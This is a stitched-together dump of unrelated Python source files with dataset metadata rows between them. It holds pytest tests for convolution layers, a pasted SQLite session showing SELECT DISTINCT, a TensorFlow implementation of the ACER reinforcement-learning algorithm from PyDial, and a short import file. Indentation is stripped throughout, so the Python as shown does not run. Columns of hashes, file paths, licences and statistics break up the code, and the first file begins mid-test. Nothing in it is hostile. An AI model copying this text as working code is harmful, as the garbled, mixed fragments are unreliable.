layer = ConvLayer2D(w=w, b=b, padding='valid')
# when
forward_result = layer.forward_pass(activation, training=True)
backward_result = layer.backward_pass(forward_result)
# then
assert backward_result.shape == activation.shape
class TestFastConvLayer2D:
def test_forward_pass_with_same_padding(self):
# given
w = np.random.rand(5, 5, 3, 16)
b = np.random.rand(16)
activation = np.random.rand(16, 11, 11, 3)
padding = 'same'
# when
layer = FastConvLayer2D(w=w, b=b, padding=padding)
result = layer.forward_pass(activation, training=True)
assert result.shape == (16, 11, 11, 16)
expected_val = np.sum(w[:, :, :, 0] * activation[0, 0:5, 0:5, :]) + b[0]
assert abs(expected_val - result[0, 2, 2, 0]) < 1e-8
def test_forward_pass_with_valid_padding(self):
# given
w = np.random.rand(5, 5, 3, 16)
b = np.random.rand(16)
activation = np.random.rand(16, 11, 11, 3)
padding = 'valid'
# when
layer = FastConvLayer2D(w=w, b=b, padding=padding)
result = layer.forward_pass(activation, training=True)
assert result.shape == (16, 7, 7, 16)
expected_val = np.sum(w[:, :, :, 0] * activation[0, 0:5, 0:5, :]) + b[0]
assert abs(expected_val - result[0, 0, 0, 0]) < 1e-8
def test_forward_pass_with_invalid_padding_value(self):
# given
w = np.random.rand(5, 5, 3, 16)
b = np.random.rand(16)
activation = np.random.rand(16, 11, 11, 3)
padding = 'lorem ipsum'
# when
layer = FastConvLayer2D(w=w, b=b, padding=padding)
with pytest.raises(InvalidPaddingModeError):
_ = layer.forward_pass(activation, training=True)
def test_backward_pass_only_size_same_padding(self):
# given
activation = np.random.rand(64, 11, 11, 3)
w = np.random.rand(5, 5, 3, 16)
b = np.random.rand(16)
layer = FastConvLayer2D(w=w, b=b, padding='same')
# when
forward_result = layer.forward_pass(activation, training=True)
backward_result = layer.backward_pass(forward_result)
# then
assert backward_result.shape == activation.shape
def test_backward_pass_only_size_valid_padding(self):
# given
activation = np.random.rand(64, 11, 11, 3)
w = np.random.rand(5, 5, 3, 16)
b = np.random.rand(16)
layer = FastConvLayer2D(w=w, b=b, padding='valid')
# when
forward_result = layer.forward_pass(activation, training=True)
backward_result = layer.backward_pass(forward_result)
# then
assert backward_result.shape == activation.shape
class TestSuperFastConvLayer2D:
def test_forward_pass_with_same_padding(self):
# given
w = np.random.rand(5, 5, 3, 16)
b = np.random.rand(16)
activation = np.random.rand(16, 11, 11, 3)
padding = 'same'
# when
layer = SuperFastConvLayer2D(w=w, b=b, padding=padding)
result = layer.forward_pass(activation, training=True)
assert result.shape == (16, 11, 11, 16)
expected_val = np.sum(w[:, :, :, 0] * activation[0, 0:5, 0:5, :]) + b[0]
assert abs(expected_val - result[0, 2, 2, 0]) < 1e-8
def test_forward_pass_with_valid_padding(self):
# given
w = np.random.rand(5, 5, 3, 16)
b = np.random.rand(16)
activation = np.random.rand(16, 11, 11, 3)
padding = 'valid'
# when
layer = SuperFastConvLayer2D(w=w, b=b, padding=padding)
result = layer.forward_pass(activation, training=True)
assert result.shape == (16, 7, 7, 16)
expected_val = np.sum(w[:, :, :, 0] * activation[0, 0:5, 0:5, :]) + b[0]
assert abs(expected_val - result[0, 0, 0, 0]) < 1e-8
def test_forward_pass_with_invalid_padding_value(self):
# given
w = np.random.rand(5, 5, 3, 16)
b = np.random.rand(16)
activation = np.random.rand(16, 11, 11, 3)
padding = 'lorem ipsum'
# when
layer = SuperFastConvLayer2D(w=w, b=b, padding=padding)
with pytest.raises(InvalidPaddingModeError):
_ = layer.forward_pass(activation, training=True)
def test_backward_pass_only_size_same_padding(self):
# given
activation = np.random.rand(64, 11, 11, 3)
w = np.random.rand(5, 5, 3, 16)
b = np.random.rand(16)
layer = SuperFastConvLayer2D(w=w, b=b, padding='same')
# when
forward_result = layer.forward_pass(activation, training=True)
backward_result = layer.backward_pass(forward_result)
# then
assert backward_result.shape == activation.shape
def test_backward_pass_only_size_valid_padding(self):
# given
activation = np.random.rand(64, 11, 11, 3)
w = np.random.rand(5, 5, 3, 16)
b = np.random.rand(16)
layer = SuperFastConvLayer2D(w=w, b=b, padding='valid')
# when
forward_result = layer.forward_pass(activation, training=True)
backward_result = layer.backward_pass(forward_result)
# then
assert backward_result.shape == activation.shape
| 31.735695
| 80
| 0.588134
| 1,560
| 11,647
| 4.24359
| 0.05
| 0.07855
| 0.117825
| 0.069789
| 0.959819
| 0.959819
| 0.953625
| 0.953474
| 0.935196
| 0.923565
| 0
| 0.064337
| 0.28737
| 11,647
| 366
| 81
| 31.822404
| 0.733253
| 0.030909
| 0
| 0.83105
| 0
| 0
| 0.012479
| 0
| 0
| 0
| 0
| 0
| 0.13242
| 1
| 0.118721
| false
| 0.164384
| 0.018265
| 0
| 0.150685
| 0.018265
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
969e2057c9dedfac5120a104480fb8f6091154ea
| 695
|
py
|
Python
|
chapter17/examples/removing_duplicates.py
|
YordanIH/Intro_to_CS_w_Python
|
eebbb8efd7ef0d07be9bc45b6b1e8f20737ce01a
|
[
"MIT"
] | null | null | null |
chapter17/examples/removing_duplicates.py
|
YordanIH/Intro_to_CS_w_Python
|
eebbb8efd7ef0d07be9bc45b6b1e8f20737ce01a
|
[
"MIT"
] | null | null | null |
chapter17/examples/removing_duplicates.py
|
YordanIH/Intro_to_CS_w_Python
|
eebbb8efd7ef0d07be9bc45b6b1e8f20737ce01a
|
[
"MIT"
] | null | null | null |
>>> cur.execute('''SELECT PopByRegion.Region
... FROM PopByRegion INNER JOIN PopByCountry
... WHERE (PopByRegion.Region = PopByCountry.Region)
... AND ((PopByCountry.Population * 1.0) / PopByRegion.Population > 0.10)''')
<sqlite3.Cursor object at 0x7fe3e818f7a0>
>>> cur.fetchall()
[('Eastern Asia',), ('North America',), ('North America',)]
>>> cur.execute('''SELECT DISTINCT PopByRegion.Region
... FROM PopByRegion INNER JOIN PopByCountry... WHERE (PopByRegion.Region = PopByCountry.Region) ... AND ((PopByCountry.Population * 1.0) / PopByRegion.Population > 0.10)''')
<sqlite3.Cursor object at 0x7fe3e818f7a0>
>>> cur.fetchall()
[('Eastern Asia',), ('North America',)]
| 53.461538
| 195
| 0.68777
| 73
| 695
| 6.547945
| 0.356164
| 0.142259
| 0.066946
| 0.133891
| 0.891213
| 0.891213
| 0.891213
| 0.891213
| 0.891213
| 0.891213
| 0
| 0.046358
| 0.130935
| 695
| 13
| 196
| 53.461538
| 0.745033
| 0
| 0
| 0.333333
| 0
| 0.083333
| 0.701149
| 0.135057
| 0
| 0
| 0.04023
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
96a55ff7e612ff7eb4b9d5bec6dbb3ac0c212a55
| 24,356
|
py
|
Python
|
policy/DRL/acer.py
|
Dagu9/Reinforcement-learning-SGD
|
eb4a2546d6c99917b33e8cc4c210709e7d4cc15e
|
[
"Apache-2.0"
] | 2
|
2020-01-20T14:43:27.000Z
|
2021-04-29T12:21:05.000Z
|
policy/DRL/acer.py
|
gdialektakis/Statistical-Dialogue-Systems-with-Adversarial-AutoEncoders
|
cbfcc6e8afb0cde65b11f5206e00584031f4eaa6
|
[
"Apache-2.0"
] | null | null | null |
policy/DRL/acer.py
|
gdialektakis/Statistical-Dialogue-Systems-with-Adversarial-AutoEncoders
|
cbfcc6e8afb0cde65b11f5206e00584031f4eaa6
|
[
"Apache-2.0"
] | null | null | null |
###############################################################################
# PyDial: Multi-domain Statistical Spoken Dialogue System Software
###############################################################################
#
# Copyright 2015 - 2019
# Cambridge University Engineering Department Dialogue Systems Group
#
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
###############################################################################
"""
Implementation of ACER
The algorithm is developed with Tensorflow
Author: Gellert Weisz
"""
import tensorflow as tf
import numpy as np
import numpy as np
import tensorflow as tf
from random import choice
from time import sleep
from time import time
import sys # todo remove later
# ===========================
# Actor Critic with Experience Replay
# ===========================
class ACERNetwork(object):
def __init__(self, sess, state_dim, action_dim, learning_rate, delta, c, alpha, h1_size = 130, h2_size = 50, is_training = True, actfreq_loss=None):
self.sess = sess
self.s_dim = state_dim
self.a_dim = action_dim
self.learning_rate = learning_rate
self.delta = delta
self.c = c
self.alpha = alpha
self.h1_size = h1_size
self.h2_size = h2_size
self.is_training = is_training
#Input and hidden layers
self.inputs = tf.placeholder(tf.float32, [None, self.s_dim])
self.actions = tf.placeholder(tf.float32, [None, self.a_dim])
self.execMask = tf.placeholder(tf.float32, [None, self.a_dim])
#if actfreq_loss is not False:
def construct_theta():
W_fc1 = tf.Variable(tf.truncated_normal([self.s_dim, self.h1_size], stddev=0.01))
b_fc1 = tf.Variable(0.0 * tf.ones([self.h1_size]))
if self.h2_size > 0: # todo layer 2 should be shared between policy and q-function?
W_h2 = tf.Variable(tf.truncated_normal([self.h1_size, self.h2_size], stddev=0.01))
b_h2 = tf.Variable(0.0 * tf.ones([self.h2_size]))
W_q = tf.Variable(tf.truncated_normal([self.h2_size, self.a_dim], stddev=0.01))
b_q = tf.Variable(0.0 * tf.ones([self.a_dim]))
W_policy = tf.Variable(tf.truncated_normal([self.h2_size, self.a_dim], stddev=0.01))
b_policy = tf.Variable(0.0 * tf.ones([self.a_dim]))
theta = [W_fc1, b_fc1, W_h2, b_h2, W_q, b_q, W_policy, b_policy]
else:
W_q = tf.Variable(tf.truncated_normal([self.h1_size, self.a_dim], stddev=0.01))
b_q = tf.Variable(0.0 * tf.ones([self.a_dim]))
W_policy = tf.Variable(tf.truncated_normal([self.h1_size, self.a_dim], stddev=0.01))
b_policy = tf.Variable(0.0 * tf.ones([self.a_dim]))
theta = [W_fc1, b_fc1, W_q, b_q, W_policy, b_policy]
return theta
self.theta = construct_theta()
self.avg_theta = construct_theta()
def construct_network(theta):
if self.h2_size > 0:
W_fc1, b_fc1, W_h2, b_h2, W_q, b_q, W_policy, b_policy = theta
else:
W_fc1, b_fc1, W_q, b_q, W_policy, b_policy = theta
h_fc1 = tf.nn.relu(tf.matmul(self.inputs, W_fc1) + b_fc1)
if self.h2_size > 0:
h_h2 = tf.nn.relu(tf.matmul(h_fc1, W_h2) + b_h2)
# Q function
q = tf.matmul(h_h2, W_q) + b_q
# prevent problem when calling log(self.policy)
policy = tf.nn.softmax(tf.matmul(h_h2, W_policy) + b_policy + self.execMask) + 0.00001
else: # 1 hidden layer
# value function
q = tf.matmul(h_fc1, W_q) + b_q
# policy function
policy = tf.nn.softmax(tf.matmul(h_fc1, W_policy) + b_policy + self.execMask) + 0.00001
return policy, q
self.policy, self.q = construct_network(self.theta)
self.avg_policy, _ = construct_network(self.avg_theta)
self.avg_policy = tf.stop_gradient(self.avg_policy)
# weighted average over q-values according to current policy gives the value of the state
self.value = tf.reduce_sum(self.q * self.policy, 1)
self.actions_onehot = self.actions
self.responsible_outputs = tf.reduce_sum(self.policy * self.actions_onehot, [1])
self.responsible_q = tf.reduce_sum(self.q * self.actions_onehot, [1])
# IS weights
self.mu = tf.placeholder(tf.float32, [None, self.a_dim])
self.responsible_mu = tf.reduce_sum(self.mu * self.actions_onehot, [1])
self.rho = self.responsible_outputs / self.responsible_mu
self.rho_all = self.policy / self.mu
self.rho_bar = tf.minimum(1., self.rho)
self.rho_bar_c = tf.minimum(self.c, self.rho)
self.q_ret = tf.placeholder(tf.float32, [None])
# step 1 from pawel
self.advantages_qret = self.q_ret - self.value
self.wrt_theta_step1 = -tf.reduce_sum(tf.log(self.responsible_outputs) * tf.stop_gradient(self.rho * self.advantages_qret))
# step 2 from pawel
self.wrt_theta = tf.reduce_sum(
tf.log(self.responsible_outputs) * tf.stop_gradient(self.rho_bar_c * self.advantages_qret) +
tf.reduce_sum(tf.log(self.policy) *
tf.stop_gradient(tf.maximum(0., 1. - self.c / self.rho_all) *
self.policy * (self.q - tf.reshape(self.value, [-1, 1]))), [1]))
self.wrt_theta_v = tf.reduce_sum(tf.square(self.q_ret - self.responsible_q))
self.entropy = -tf.reduce_sum(self.policy * tf.log(self.policy))
#self.loss = self.wrt_theta_v + self.wrt_theta - self.entropy * 0.01
self.target_v = tf.placeholder(tf.float32, [None])
self.advantages = tf.placeholder(tf.float32, [None])
self.advantage_qret_diff = tf.reduce_mean(tf.square(self.advantages - self. advantages_qret))
# DEBUG (A2C)
#self.value_loss = 0.5 * tf.reduce_sum(tf.square(self.target_v - tf.reshape(self.value, [-1]))) # original a2c
self.q_loss = 0.5 * self.wrt_theta_v
self.policy_loss = -self.wrt_theta
self.entropy = - tf.reduce_sum(self.policy * tf.log(self.policy))
self.loss = self.q_loss + self.policy_loss - 0.01 * self.entropy
self.optimizer = tf.train.AdamOptimizer(self.learning_rate)
self.optimize = self.optimizer.minimize(self.loss)
# TRPO in theta-space
use_trpo = True # can switch off TRPO here
self.value_gradients = self.optimizer.compute_gradients(self.q_loss)
self.entropy_gradients = self.optimizer.compute_gradients(-0.01 * self.entropy)
self.g = self.optimizer.compute_gradients(-self.policy_loss)
self.kl = tf.reduce_sum(tf.reduce_sum(self.avg_policy * tf.log(self.avg_policy / self.policy), [1])) # this is total KL divergence, per batch
self.k = self.optimizer.compute_gradients(self.kl)
self.g = [(grad, var) for grad, var in self.g if grad is not None]
self.k = [(grad, var) for grad, var in self.k if grad is not None]
assert len(self.g) == len(self.k)
self.klprod = tf.reduce_sum([tf.reduce_sum(tf.reshape(k[0], [-1]) * tf.reshape(g[0], [-1])) for k, g in zip(self.k, self.g)])
self.klen = tf.reduce_sum([tf.reduce_sum(tf.reshape(k[0], [-1]) * tf.reshape(k[0], [-1])) for k, g in zip(self.k, self.g)])
self.trpo_scale = tf.maximum(0., (self.klprod - self.delta) / self.klen)
self.final_gradients = []
for i in range(len(self.g)):
if use_trpo:
self.final_gradients.append((-(self.g[i][0] - self.trpo_scale * self.k[i][0]), self.g[i][1])) # negative because this is loss
else:
self.final_gradients.append((-self.g[i][0], self.g[i][1])) # negative because this is loss
self.optimize = [self.optimizer.apply_gradients(self.final_gradients),
self.optimizer.apply_gradients(self.entropy_gradients),
self.optimizer.apply_gradients(self.value_gradients)]
self.update_avg_theta = [avg_w.assign(self.alpha * avg_w + (1. - self.alpha) * w)
for avg_w, w in zip(self.avg_theta, self.theta)]
def getPolicy(self, inputs, execMask):
return self.sess.run([self.policy], feed_dict={
self.inputs: inputs,
self.execMask: execMask,
})
def train(self, inputs, actions, execMask, rewards, unflattened_inputs, unflattened_rewards, gamma, mu, discounted_rewards, advantages):
value, responsible_q, rho_bar, responsible_outputs = self.sess.run(
[self.value, self.responsible_q, self.rho_bar, self.responsible_outputs], feed_dict={
self.inputs: inputs,
self.actions: actions,
self.execMask: execMask,
self.mu: mu,
})
q_rets, offset = [], 0
#print >> sys.stderr, rho_bar[0], value[0], responsible_q[0]
for j in range(0, len(unflattened_inputs)): # todo implement retrace for lambda other than one
q_ret, new_q_ret = [], 0
for i in range(len(unflattened_inputs[j])-1, -1, -1):
new_q_ret = rewards[offset+i] + gamma * new_q_ret
q_ret.append(new_q_ret)
new_q_ret = rho_bar[offset+i] * (new_q_ret - responsible_q[offset+i]) + value[offset+i]
#new_q_ret = value[offset+i] # debug
q_ret = list(reversed(q_ret))
q_rets.append(q_ret)
offset += len(unflattened_inputs[j])
q_ret_flat = np.concatenate(np.array(q_rets), axis=0).tolist()
feed_dict = {
self.inputs: inputs,
self.actions: actions,
self.execMask: execMask,
self.mu: mu,
self.q_ret: q_ret_flat,
self.target_v: discounted_rewards,
self.advantages: advantages,
}
trpo_scale, klprod, kl, diff, entropy, loss, optimize = self.sess.run([self.trpo_scale, self.klprod, self.kl, self.advantage_qret_diff, self.entropy, self.loss, self.optimize], feed_dict=feed_dict)
update_avg_theta = self.sess.run([self.update_avg_theta], feed_dict=feed_dict)
return loss, entropy, optimize
def predict_policy(self, inputs, execMask):
return self.sess.run(self.policy, feed_dict={
self.inputs: inputs,
self.execMask: execMask,
})
def predict_value(self, inputs, execMask):
return self.sess.run(self.value, feed_dict={
self.inputs: inputs,
self.execMask: execMask,
})
def predict_action_value(self, inputs, execMask):
return self.sess.run([self.policy, self.value], feed_dict={
self.inputs: inputs,
self.execMask: execMask,
})
def load_network(self, load_filename):
self.saver = tf.train.Saver()
if load_filename.split('.')[-3] != '0':
try:
self.saver.restore(self.sess, load_filename)
print "Successfully loaded:", load_filename
except:
print "Could not find old network weights"
else:
print 'nothing loaded in first iteration'
def save_network(self, save_filename):
print 'Saving acer-network...'
self.saver.save(self.sess, save_filename)
class RNNACERNetwork(object):
def __init__(self, sess, si_state_dim, sd_state_dim, action_dim, learning_rate, delta, c, alpha, h1_size = 130, h2_size = 50, is_training = True, sd_enc_size=25,
si_enc_size=25, dropout_rate=0., tn='normal', slot='si'):
self.sess = sess
self.s_dim = si_state_dim + sd_state_dim
self.a_dim = action_dim
self.learning_rate = learning_rate
self.delta = delta
self.c = c
self.alpha = alpha
self.h1_size = h1_size
self.h2_size = h2_size
self.is_training = is_training
self.sd_dim = sd_state_dim
self.si_dim = si_state_dim
self.sd_enc_size = sd_enc_size
#Input and hidden layers
self.inputs = tf.placeholder(tf.float32, [None, self.s_dim])
self.actions = tf.placeholder(tf.float32, [None, self.a_dim])
self.execMask = tf.placeholder(tf.float32, [None, self.a_dim])
keep_prob = 1 - dropout_rate
sd_inputs, si_inputs = tf.split(self.inputs, [self.sd_dim, self.si_dim], 1)
if slot == 'sd':
sd_inputs = tf.reshape(sd_inputs, (tf.shape(sd_inputs)[0], 1, self.sd_dim))
# slots encoder
with tf.variable_scope(tn):
# try:
lstm_cell = tf.nn.rnn_cell.GRUCell(self.sd_enc_size)
if keep_prob < 1:
lstm_cell = tf.nn.rnn_cell.DropoutWrapper(lstm_cell, output_keep_prob=keep_prob)
hidden_state = lstm_cell.zero_state(tf.shape(sd_inputs)[0], tf.float32)
_, h_sdfe = tf.nn.dynamic_rnn(lstm_cell, sd_inputs, initial_state=hidden_state)
# except:
# lstm_cell = tf.contrib.rnn.GRUCell(self.sd_enc_size)
# hidden_state = lstm_cell.zero_state(tf.shape(sd_inputs)[0], tf.float32)
# _, h_sdfe = tf.contrib.rnn.dynamic_rnn(lstm_cell, sd_inputs, initial_state=hidden_state)
h1_inputs = tf.concat((si_inputs, h_sdfe), 1)
else:
'''W_sdfe = tf.Variable(tf.truncated_normal([self.sd_dim, sd_enc_size], stddev=0.01))
b_sdfe = tf.Variable(tf.zeros([sd_enc_size]))
h_sdfe = tf.nn.relu(tf.matmul(sd_inputs, W_sdfe) + b_sdfe)
if keep_prob < 1:
h_sdfe = tf.nn.dropout(h_sdfe, keep_prob)'''
h1_inputs = self.inputs
def construct_theta():
W_fc1 = tf.Variable(tf.truncated_normal([self.s_dim, self.h1_size], stddev=0.01))
b_fc1 = tf.Variable(0.0 * tf.ones([self.h1_size]))
if self.h2_size > 0: # todo layer 2 should be shared between policy and q-function?
W_h2 = tf.Variable(tf.truncated_normal([self.h1_size, self.h2_size], stddev=0.01))
b_h2 = tf.Variable(0.0 * tf.ones([self.h2_size]))
W_q = tf.Variable(tf.truncated_normal([self.h2_size, self.a_dim], stddev=0.01))
b_q = tf.Variable(0.0 * tf.ones([self.a_dim]))
W_policy = tf.Variable(tf.truncated_normal([self.h2_size, self.a_dim], stddev=0.01))
b_policy = tf.Variable(0.0 * tf.ones([self.a_dim]))
theta = [W_fc1, b_fc1, W_h2, b_h2, W_q, b_q, W_policy, b_policy]
else:
W_q = tf.Variable(tf.truncated_normal([self.h1_size, self.a_dim], stddev=0.01))
b_q = tf.Variable(0.0 * tf.ones([self.a_dim]))
W_policy = tf.Variable(tf.truncated_normal([self.h1_size, self.a_dim], stddev=0.01))
b_policy = tf.Variable(0.0 * tf.ones([self.a_dim]))
theta = [W_fc1, b_fc1, W_q, b_q, W_policy, b_policy]
return theta
self.theta = construct_theta()
self.avg_theta = construct_theta()
def construct_network(theta):
if self.h2_size > 0:
W_fc1, b_fc1, W_h2, b_h2, W_q, b_q, W_policy, b_policy = theta
else:
W_fc1, b_fc1, W_q, b_q, W_policy, b_policy = theta
h_fc1 = tf.nn.relu(tf.matmul(h1_inputs, W_fc1) + b_fc1)
if self.h2_size > 0:
h_h2 = tf.nn.relu(tf.matmul(h_fc1, W_h2) + b_h2)
# Q function
q = tf.matmul(h_h2, W_q) + b_q
# prevent problem when calling log(self.policy)
policy = tf.nn.softmax(tf.matmul(h_h2, W_policy) + b_policy + self.execMask) + 0.00001
else: # 1 hidden layer
# value function
q = tf.matmul(h_fc1, W_q) + b_q
# policy function
policy = tf.nn.softmax(tf.matmul(h_fc1, W_policy) + b_policy + self.execMask) + 0.00001
return policy, q
self.policy, self.q = construct_network(self.theta)
self.avg_policy, _ = construct_network(self.avg_theta)
self.avg_policy = tf.stop_gradient(self.avg_policy)
# weighted average over q-values according to current policy gives the value of the state
self.value = tf.reduce_sum(self.q * self.policy, 1)
self.actions_onehot = self.actions
self.responsible_outputs = tf.reduce_sum(self.policy * self.actions_onehot, [1])
self.responsible_q = tf.reduce_sum(self.q * self.actions_onehot, [1])
# IS weights
self.mu = tf.placeholder(tf.float32, [None, self.a_dim])
self.responsible_mu = tf.reduce_sum(self.mu * self.actions_onehot, [1])
self.rho = self.responsible_outputs / self.responsible_mu
self.rho_all = self.policy / self.mu
self.rho_bar = tf.minimum(1., self.rho)
self.rho_bar_c = tf.minimum(self.c, self.rho)
self.q_ret = tf.placeholder(tf.float32, [None])
# step 1 from pawel
self.advantages_qret = self.q_ret - self.value
self.wrt_theta_step1 = -tf.reduce_sum(tf.log(self.responsible_outputs) * tf.stop_gradient(self.rho * self.advantages_qret))
# step 2 from pawel
self.wrt_theta = tf.reduce_sum(
tf.log(self.responsible_outputs) * tf.stop_gradient(self.rho_bar_c * self.advantages_qret) +
tf.reduce_sum(tf.log(self.policy) *
tf.stop_gradient(tf.maximum(0., 1. - self.c / self.rho_all) *
self.policy * (self.q - tf.reshape(self.value, [-1, 1]))), [1]))
self.wrt_theta_v = tf.reduce_sum(tf.square(self.q_ret - self.responsible_q))
self.entropy = -tf.reduce_sum(self.policy * tf.log(self.policy))
#self.loss = self.wrt_theta_v + self.wrt_theta - self.entropy * 0.01
self.target_v = tf.placeholder(tf.float32, [None])
self.advantages = tf.placeholder(tf.float32, [None])
self.advantage_qret_diff = tf.reduce_mean(tf.square(self.advantages - self. advantages_qret))
# DEBUG (A2C)
#self.value_loss = 0.5 * tf.reduce_sum(tf.square(self.target_v - tf.reshape(self.value, [-1]))) # original a2c
self.q_loss = 0.5 * self.wrt_theta_v
self.policy_loss = -self.wrt_theta
self.entropy = - tf.reduce_sum(self.policy * tf.log(self.policy))
self.loss = self.q_loss + self.policy_loss - 0.01 * self.entropy
self.optimizer = tf.train.AdamOptimizer(self.learning_rate)
self.optimize = self.optimizer.minimize(self.loss)
# TRPO in theta-space
use_trpo = True # can switch off TRPO here
self.value_gradients = self.optimizer.compute_gradients(self.q_loss)
self.entropy_gradients = self.optimizer.compute_gradients(-0.01 * self.entropy)
self.g = self.optimizer.compute_gradients(-self.policy_loss)
self.kl = tf.reduce_sum(tf.reduce_sum(self.avg_policy * tf.log(self.avg_policy / self.policy), [1])) # this is total KL divergence, per batch
self.k = self.optimizer.compute_gradients(self.kl)
self.g = [(grad, var) for grad, var in self.g if grad is not None]
self.k = [(grad, var) for grad, var in self.k if grad is not None]
assert len(self.g) == len(self.k)
self.klprod = tf.reduce_sum([tf.reduce_sum(tf.reshape(k[0], [-1]) * tf.reshape(g[0], [-1])) for k, g in zip(self.k, self.g)])
self.klen = tf.reduce_sum([tf.reduce_sum(tf.reshape(k[0], [-1]) * tf.reshape(k[0], [-1])) for k, g in zip(self.k, self.g)])
self.trpo_scale = tf.maximum(0., (self.klprod - self.delta) / self.klen)
self.final_gradients = []
for i in range(len(self.g)):
if use_trpo:
self.final_gradients.append((-(self.g[i][0] - self.trpo_scale * self.k[i][0]), self.g[i][1])) # negative because this is loss
else:
self.final_gradients.append((-self.g[i][0], self.g[i][1])) # negative because this is loss
self.optimize = [self.optimizer.apply_gradients(self.final_gradients),
self.optimizer.apply_gradients(self.entropy_gradients),
self.optimizer.apply_gradients(self.value_gradients)]
self.update_avg_theta = [avg_w.assign(self.alpha * avg_w + (1. - self.alpha) * w)
for avg_w, w in zip(self.avg_theta, self.theta)]
def getPolicy(self, inputs, execMask):
return self.sess.run([self.policy], feed_dict={
self.inputs: inputs,
self.execMask: execMask,
})
def train(self, inputs, actions, execMask, rewards, unflattened_inputs, unflattened_rewards, gamma, mu, discounted_rewards, advantages):
value, responsible_q, rho_bar, responsible_outputs = self.sess.run(
[self.value, self.responsible_q, self.rho_bar, self.responsible_outputs], feed_dict={
self.inputs: inputs,
self.actions: actions,
self.execMask: execMask,
self.mu: mu,
})
q_rets, offset = [], 0
#print >> sys.stderr, rho_bar[0], value[0], responsible_q[0]
for j in range(0, len(unflattened_inputs)): # todo implement retrace for lambda other than one
q_ret, new_q_ret = [], 0
for i in range(len(unflattened_inputs[j])-1, -1, -1):
new_q_ret = rewards[offset+i] + gamma * new_q_ret
q_ret.append(new_q_ret)
new_q_ret = rho_bar[offset+i] * (new_q_ret - responsible_q[offset+i]) + value[offset+i]
#new_q_ret = value[offset+i] # debug
q_ret = list(reversed(q_ret))
q_rets.append(q_ret)
offset += len(unflattened_inputs[j])
q_ret_flat = np.concatenate(np.array(q_rets), axis=0).tolist()
feed_dict = {
self.inputs: inputs,
self.actions: actions,
self.execMask: execMask,
self.mu: mu,
self.q_ret: q_ret_flat,
self.target_v: discounted_rewards,
self.advantages: advantages,
}
trpo_scale, klprod, kl, diff, entropy, loss, optimize = self.sess.run([self.trpo_scale, self.klprod, self.kl, self.advantage_qret_diff, self.entropy, self.loss, self.optimize], feed_dict=feed_dict)
update_avg_theta = self.sess.run([self.update_avg_theta], feed_dict=feed_dict)
return loss, entropy, optimize
def predict_policy(self, inputs, execMask):
return self.sess.run(self.policy, feed_dict={
self.inputs: inputs,
self.execMask: execMask,
})
def predict_value(self, inputs, execMask):
return self.sess.run(self.value, feed_dict={
self.inputs: inputs,
self.execMask: execMask,
})
def predict_action_value(self, inputs, execMask):
return self.sess.run([self.policy, self.value], feed_dict={
self.inputs: inputs,
self.execMask: execMask,
})
def load_network(self, load_filename):
self.saver = tf.train.Saver()
if load_filename.split('.')[-3] != '0':
try:
self.saver.restore(self.sess, load_filename)
print "Successfully loaded:", load_filename
except:
print "Could not find old network weights"
else:
print 'nothing loaded in first iteration'
def save_network(self, save_filename):
print 'Saving acer-network...'
#self.saver = tf.train.Saver()
self.saver.save(self.sess, save_filename)
| 46.74856
| 205
| 0.603794
| 3,438
| 24,356
| 4.078243
| 0.093368
| 0.025676
| 0.026674
| 0.018544
| 0.904001
| 0.890236
| 0.88075
| 0.876685
| 0.876685
| 0.876685
| 0
| 0.020805
| 0.265889
| 24,356
| 520
| 206
| 46.838462
| 0.763367
| 0.110117
| 0
| 0.916898
| 0
| 0
| 0.011071
| 0
| 0
| 0
| 0
| 0.003846
| 0.00554
| 0
| null | null | 0
| 0.022161
| null | null | 0.022161
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
96aad596783af257f22c3dd4f27142ee5c482efd
| 170
|
py
|
Python
|
flash/core/data/__init__.py
|
alvin-chang/lightning-flash
|
481d4d369ff0a5d8c2b2d9e4970c5608a92b3ff5
|
[
"Apache-2.0"
] | 2
|
2021-06-25T08:42:36.000Z
|
2021-06-25T08:49:29.000Z
|
flash/core/data/__init__.py
|
alvin-chang/lightning-flash
|
481d4d369ff0a5d8c2b2d9e4970c5608a92b3ff5
|
[
"Apache-2.0"
] | null | null | null |
flash/core/data/__init__.py
|
alvin-chang/lightning-flash
|
481d4d369ff0a5d8c2b2d9e4970c5608a92b3ff5
|
[
"Apache-2.0"
] | null | null | null |
from flash.core.data.datamodule import DataModule, TaskDataPipeline
from flash.core.data.datapipeline import DataPipeline
from flash.core.data.utils import download_data
| 42.5
| 67
| 0.864706
| 23
| 170
| 6.347826
| 0.434783
| 0.184932
| 0.267123
| 0.349315
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.076471
| 170
| 3
| 68
| 56.666667
| 0.929936
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
